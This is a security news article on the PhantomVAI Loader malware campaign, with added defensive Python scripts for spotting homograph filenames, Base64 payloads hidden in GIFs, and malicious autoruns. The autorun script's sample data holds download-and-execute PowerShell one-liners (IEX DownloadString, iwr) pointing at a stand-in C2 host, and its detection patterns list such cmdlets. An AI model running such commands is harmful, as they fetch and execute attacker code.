A complex multi-stage malware campaign is targeting organizations globally, using the PhantomVAI Loader to distribute information-stealing malware.
The attack chain, which begins with carefully crafted phishing emails, has emerged as a major risk to companies across the manufacturing, education, healthcare, technology, utilities, and government sectors.
This malware family, previously known as Katz Stealer Loader, has evolved to deliver multiple infostealer variants including AsyncRAT, XWorm, FormBook, and DCRat, making it a versatile tool in the cybercriminal arsenal.
The infection begins when unsuspecting users receive phishing emails containing malicious attachments disguised as legitimate business communications.
These emails use social engineering themes such as sales inquiries, payment notifications, and legal matters to lure victims into opening archived JavaScript or VBS files.
What makes these attacks particularly insidious is the use of homograph attacks, where threat actors replace Latin characters with visually similar Unicode characters, effectively bypassing email security filters.
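One defensive check against the homograph trick described above is to flag attachment names (or sender domains) whose letters come from more than one script, or that change under Unicode compatibility normalization. The following is an added example written for this article, not code from Palo Alto Networks or from the report; the sample filenames are constructed.

```python
import unicodedata


def script_of(ch):
    """Script label for a letter: the first word of its Unicode name
    ('LATIN', 'CYRILLIC', 'GREEK', 'FULLWIDTH', ...). None for non-letters."""
    if not ch.isalpha():
        return None
    name = unicodedata.name(ch, "")
    return name.split(" ")[0] if name else None


def non_latin_letters(text):
    """Every letter that is not plain Latin script, as (index, char, unicode name)."""
    hits = []
    for i, ch in enumerate(text):
        label = script_of(ch)
        if label is not None and label != "LATIN":
            hits.append((i, ch, unicodedata.name(ch, "UNKNOWN")))
    return hits


def is_mixed_script(text):
    """True when letters from more than one script label occur in the string."""
    labels = {script_of(ch) for ch in text} - {None}
    return len(labels) > 1


def triage_attachment_name(name):
    """Flag a filename (or sender domain) that mixes scripts or changes under NFKC."""
    folded = unicodedata.normalize("NFKC", name)
    hits = non_latin_letters(name)
    mixed = is_mixed_script(name)
    return {
        "name": name,
        "mixed_script": mixed,
        "non_latin": hits,
        "nfkc_differs": folded != name,
        "suspicious": mixed or folded != name,
    }


# Constructed sample attachment names (not taken from the report); the spoofed
# ones swap one Latin letter for a Cyrillic or compatibility look-alike.
SAMPLE_NAMES = [
    "Invoice_2024.js",
    "Invoi\u0441e_2024.js",     # U+0441 CYRILLIC SMALL LETTER ES in place of 'c'
    "P\u0430yment_notice.vbs",  # U+0430 CYRILLIC SMALL LETTER A in place of 'a'
    "\uff29nvoice.zip",         # U+FF29 FULLWIDTH LATIN CAPITAL LETTER I
]


def triage_all(names=SAMPLE_NAMES):
    """Run the triage over a list of names and return one verdict per name."""
    return [triage_attachment_name(n) for n in names]


if __name__ == "__main__":
    for verdict in triage_all():
        status = "SUSPICIOUS" if verdict["suspicious"] else "ok"
        print(verdict["name"], "->", status, verdict["non_latin"])
```

The script-label heuristic is deliberately coarse: anything whose Unicode name does not start with LATIN is reported, so fullwidth and other compatibility forms are caught by both the script check and the NFKC comparison. A mail gateway rule would typically combine this with a check on the archive's inner file extensions (.js, .vbs).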
PhantomVAI Loader attack chain (Source – Palo Alto Networks)
After the initial phishing stage, Palo Alto Networks analysts identified that the attack progresses through several sophisticated layers.
The malicious scripts are heavily obfuscated and contain Base64-encoded PowerShell commands that execute automatically upon opening.
These PowerShell scripts download what appears to be an innocuous GIF or image file from attacker-controlled servers.
The beginning of encoded Base64 text embedded in a GIF file (Source – Palo Alto Networks)
However, these image files hide the loader payload using steganography techniques, where Base64-encoded DLL data is embedded within the image data between specific delimiter strings such as > and >.
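A triage script for the image-carrier stage described above can carve long Base64 runs out of a downloaded "image" and test whether they decode to a PE file. This is an added example, not tooling from Palo Alto Networks; because the report's specific delimiter strings are not reproduced on this page, it scans generically for any long Base64 run rather than for those delimiters. The GIF and the "DLL" inside it are constructed stand-ins, not real samples.

```python
import base64
import re

# Minimum length of a Base64 run worth decoding; real DLLs are far longer.
MIN_RUN = 64
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{%d,}={0,2}" % MIN_RUN)


def carve_base64_runs(data):
    """Return (offset, decoded_bytes) for every long Base64 run that decodes cleanly."""
    found = []
    for m in B64_RUN.finditer(data):
        chunk = m.group(0)
        chunk += b"=" * (-len(chunk) % 4)   # repair padding on a truncated run
        try:
            decoded = base64.b64decode(chunk, validate=True)
        except ValueError:                   # binascii.Error is a ValueError
            continue
        found.append((m.start(), decoded))
    return found


def looks_like_pe(blob):
    """Cheap PE check: DOS 'MZ' signature at offset 0."""
    return blob[:2] == b"MZ"


def scan_image(data):
    """Triage an image file: GIF magic present, and does it carry a Base64 PE?"""
    findings = [
        {"offset": off, "size": len(blob), "pe_header": looks_like_pe(blob)}
        for off, blob in carve_base64_runs(data)
    ]
    return {
        "gif_magic": data[:6] in (b"GIF87a", b"GIF89a"),
        "embedded_pe": any(f["pe_header"] for f in findings),
        "findings": findings,
    }


# Constructed samples (not from the report): a minimal GIF header followed by a
# Base64-encoded stand-in for a DLL (an 'MZ' stub, not a real binary), and a
# clean one-pixel GIF with no embedded text.
GIF_PREFIX = b"GIF89a\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff\x00\x00\x00"
FAKE_DLL = b"MZ" + b"\x90" * 100 + b"PE\x00\x00"
SAMPLE_GIF = GIF_PREFIX + b"\r\n" + base64.b64encode(FAKE_DLL) + b"\r\n;"
CLEAN_GIF = GIF_PREFIX + b"\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02\x44\x01\x00\x3b"

if __name__ == "__main__":
    for label, blob in (("sample", SAMPLE_GIF), ("clean", CLEAN_GIF)):
        print(label, scan_image(blob))
```

Run it over files fetched by PowerShell from unfamiliar hosts (proxy logs give the URLs): a valid GIF header with an embedded PE is the pattern to alert on, and the `offset` tells an analyst where the real image data ends and the appended text begins.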
Infection Mechanism and Evasion Techniques
Once the encoded text is extracted, the PowerShell script decodes it and loads the PhantomVAI Loader DLL, which is written in C#. The loader executes a method called VAI, which performs several critical functions before deploying the final payload.
It conducts comprehensive virtual machine detection checks using code based on the VMDetector GitHub project.
The malware examines system attributes including computer information, BIOS details, hard disk characteristics, and Windows services to determine whether it is running in a virtualized environment.
If any check returns positive, PhantomVAI Loader immediately terminates.
The loader establishes persistence through scheduled tasks that execute PowerShell commands to download and run files from attacker-controlled URLs, or by creating Windows Registry Run keys.
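The persistence mechanisms just described, and the Base64-encoded PowerShell commands mentioned earlier, can be hunted with one pass over exported scheduled-task actions and Run-key values: launch PowerShell, decode any `-EncodedCommand` argument (Base64 of UTF-16LE), and look for download-and-execute cues and URLs. This is an added example for this article, not Palo Alto Networks' code; the autorun entries are constructed and use the reserved `.invalid` domain.

```python
import base64
import re

LAUNCHES_PS = re.compile(r"\b(powershell(\.exe)?|pwsh(\.exe)?)\b", re.I)
ENCODED_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
DOWNLOAD_CUES = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bwget\b|\bcurl\b|"
    r"Net\.WebClient|Invoke-Expression|\biex\b|Start-BitsTransfer",
    re.I,
)
URL = re.compile(r"https?://", re.I)


def decode_encoded_command(cmdline):
    """Recover the script behind -EncodedCommand (Base64 of UTF-16LE), or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def assess_autorun(entry):
    """Score one autorun entry {'source', 'name', 'command'}; two or more cues = suspicious."""
    cmd = entry["command"]
    decoded = decode_encoded_command(cmd)
    effective = cmd if decoded is None else cmd + " " + decoded
    reasons = []
    if LAUNCHES_PS.search(cmd):
        reasons.append("launches PowerShell")
    if decoded is not None:
        reasons.append("uses -EncodedCommand")
    if DOWNLOAD_CUES.search(effective):
        reasons.append("download/execute cmdlet")
    if URL.search(effective):
        reasons.append("references a URL")
    return {
        "source": entry["source"],
        "name": entry["name"],
        "suspicious": len(reasons) >= 2,
        "reasons": reasons,
        "decoded": decoded,
    }


def hunt(entries):
    """Assess every entry and return the verdicts in input order."""
    return [assess_autorun(e) for e in entries]


# Constructed sample entries, shaped like exports from Get-ScheduledTask and the
# HKCU/HKLM ...\CurrentVersion\Run keys. Nothing here is taken from the report.
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/s.ps1')"
    .encode("utf-16-le")
).decode()
SAMPLE_ENTRIES = [
    {"source": "ScheduledTask", "name": "\\Updater",
     "command": "powershell.exe -w hidden -enc " + _ENCODED},
    {"source": "RunKey", "name": "VendorTray",
     "command": r"C:\Program Files\Vendor\Tray.exe --background"},
    {"source": "RunKey", "name": "OneUpdate",
     "command": r'powershell -nop -c "iwr http://c2.example.invalid/p.gif -OutFile $env:TEMP\p.gif"'},
    {"source": "ScheduledTask", "name": "\\Backup",
     "command": r"powershell.exe -File C:\Scripts\backup.ps1"},
]

if __name__ == "__main__":
    for v in hunt(SAMPLE_ENTRIES):
        print(v["source"], v["name"], "SUSPICIOUS" if v["suspicious"] else "ok", v["reasons"])
```

Requiring two cues keeps a plain `powershell.exe -File backup.ps1` task out of the alert queue while still catching an encoded one-liner whose only visible content is Base64. The decoded script is returned alongside the verdict so an analyst can read what the task actually runs.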
Infection chain that begins with the user opening an email using msedge.exe (Source – Palo Alto Networks)
Finally, it downloads the final payload from a command-and-control server and injects it into legitimate system processes using process hollowing, most commonly targeting MSBuild.exe in the .NET Framework directory.
This evasion mechanism allows the malware to operate undetected while delivering information-stealing capabilities.